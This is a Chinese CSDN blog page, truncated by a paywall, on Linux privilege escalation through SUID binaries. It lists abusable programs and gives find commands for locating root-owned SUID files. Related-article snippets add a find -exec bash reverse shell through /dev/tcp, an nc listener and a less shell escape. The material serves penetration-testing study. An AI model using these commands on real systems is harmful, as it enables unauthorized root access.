linux提权-SUID提权

最新推荐文章于 2024-07-01 22:55:02 发布
最新推荐文章于 2024-07-01 22:55:02 发布
阅读量1k 收藏 4
点赞数
分类专栏: 渗透 文章标签: linux-SUID提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40510246/article/details/95939784
版权
本文介绍了如何通过SUID权限提升在Linux环境中获取root权限。重点讨论了Nmap(尤其是旧版本)、Vim和Bash如何被利用,包括Nmap的交互模式和find、vim的SUID特性。通过特定命令,攻击者可以利用这些程序的漏洞以root权限执行shell命令。
摘要由CSDN通过智能技术生成

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。

已知的可用来提权的linux可行性的文件列表如下:

  • Nmap
  • Vim
  • find
  • Bash
  • More
  • Less
  • Nano
  • cp

以下命令可以发现系统上运行的所有SUID可执行文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

经测试发现nmap具有SUID标识

NMAP

较旧版本的Nmap(2.02至5.21)具有交互模式,

最低0.47元/天 解锁文章
进击的木头
关注
专栏目录
操作系统权限提升(十九)之Linux提权-SUID提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1924
SUID是一种特殊权限,设置了suid的程序件,在用户执行该程序时,用户的权限是该程序件属主的权限,例如程序件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的只有可以执行的二进制程序件才能设定SUID权限,非二进制件设置SUID权限没任何意义.命令执行者要对该程序件拥有执行(x)权限.命令执行者在执行该程序时获得该程序件属主的身份.
SUID提权
snowlyzz的博客
08-14 1796
久经不衰的SUID提权
linux系统suid提权
focus on security
05-19 5617
SUID提权 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序件所属的属主。但是SUID权限的设置只针对二进制可执行件,对于非可执行件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行件ls,其属主为root,当我们通过非root用户登录时,如果
LinuxSUID提权学习 - 从原理到使用
最新发布
Reset
07-01 1088
linux件有普通权限和特殊权限(三种)。普通权限一般为:rwx,分别为读写执行,对应的数字表示为421。三种特殊权限为:suid权限,sgid权限,sticky权限。其中suid权限作用于件属主,sgid权限作用于属组上,sticky权限作用于other其他上。
linuxsuid提权笔记
热门推荐
Shanfenglan's blog
08-23 26万+
find find /bin/ -name ls -exec /bin/nc -lvp123 ; find /bin/ -name ls -exec /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 ; find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null less less /etc/passwd !/bin
Linux提权————利用SUID提权
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
Linux下用SUID提权
谢公子的博客
12-07 2万+
关于SUID详细:Linux下的用户、组和权限 SUID可以让调用者以件拥有者的身份运行件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID件,那么我们运行件的时候就得获得root用户的身份了。 已知的可用来提权linux可行性的件列表如下: nmap vim find bash more less nano cp 以下命令可以发现系统运行...
Linux提权---内核提权Linux配置错误提权、定时任务提权
qq_40012781的博客
07-03 1754
Linux提权---内核提权Linux配置错误提权、定时任务提权
权限提升-linux提权手法总结
01-14
### 权限提升-linux提权手法总结 #### 1. Linux提权概述 在Linux系统中,权限管理是一项至关重要的安全措施。用户被赋予不同级别的权限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
操作系统权限提升(二十)之Linux提权-计划任务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1065
先准备一个SUID件或者权限为xx7的件,让低权限的用户可以执行件的修改,在这里我们我们准备一个sh件或者python件都可以,我们写一个linux运维脚本,来监控当前电脑的运行参数。linux计划任务提权是因为权限配置不当,计划任务以root权限运行,低权限的用户可以修改计划任务的件,从而被攻击者利用,导致提权Linux计划任务命令如下。linux件权第一部分是该件的拥有者所拥有的权限,第二部分是该件所在用户组的用户所拥有的权限,最后一部分是其他用户所拥有的权限。
SUID提权
一只web狗
07-01 1万+
SUID提权介绍
SUID提权(一)
02-19 513
大家好,我是东北码农。今天和大家分享linux下的SUID提权。 本会按照下面主题进行分享: 什么是提权 什么是SUID提权 用户、进程凭证、件权限 下一篇章会分享: CVE-2021-4034 漏洞讲解 CVE-2021-4034 利用实战 这个漏洞发现还不到3个月,应该还可以用奥。 0x1 什么是提权 最近研究了一下CVE-2021-4034,利用polkit在linux提权得漏洞。提权就是一个非root用户,不知道root密码,利用漏洞获得root权限的过程。 看一下CVE-2
Linux SUID 提权
柠檬木有枝
01-27 4850
章目录0x00 前言0x01 关于 SUID1.1 /etc/sudoers 语法1.2 查找具有 SUID 权限位件0x02 常用提权方式2.1 nmap2.2 find2.3 vi/vim2.4 bash2.5 less2.6 more2.7 cp2.8 mv2.9 nano2.10 awk2.11 man2.12 wget2.13 apache2.14 tcpdump2.15 pytho...
suid(特殊权限位)提权
ZY95001的博客
07-28 1848
一、
suid提权linux
weixin_68652890的博客
04-15 1001
suid提权 suid(设置用户的id)是Linux中的一种特殊权限,当运行具有suid权限的二进制件的时候,使得调用者暂时获得该件拥有者的权限(比如a件拥有者是root,且被赋予了s权限,当我们用另外一个普通用户调用a件的时候,调用过程中这个普通用户会获得root权限) 除了经常看见的rwx权限还有s权限 s权限,设置使件在执行阶段具有件所有者的权限,相当于临时拥有件所有者的身份。 SUID执行件被赋予了s权限,就被称为Set UID,简称为SUID的特殊权限。简称为SUID的特殊权
SUID提权教程
星虐
11-18 1359
SUID提权教程。
Linux提权SUID提权
CP1024的博客
04-04 3873
Linux提权SUID提权 SUID提权 1. SUID权限只能设置二进制件 2. 命令执行者要有二进制件的执行权 3. 命令执行执行二进制件时会获得该程序的属主身份 4. SUID权限只在程序执行中有效 即如果root给一个程序赋予了SUID权限,则普通用户在执行该程序过程中,是root权限 cp命令提权 以cp为例,这里给cp添加SUID权限做测试,拥有SUID权限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令
简谈SUID提权
2401_84466336的博客
05-28 1098
SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序件所属的属主。但是SUID权限的设置只针对二进制可执行件,对于非可执行件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行件ls,其属主为root,当我们通过非root用户登录时,如果ls。
Linux提权攻略:8大类型,30种方法解析
"这篇档是关于Linux提权的综合总结,涵盖了8大类型的提权方法,包括内核提权、服务提权、sudo提权suid提权、sgid提权、定时任务提权、nfs提权等,适合初学者理解。档中还提供了具体的实践操作示例,如自定义可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值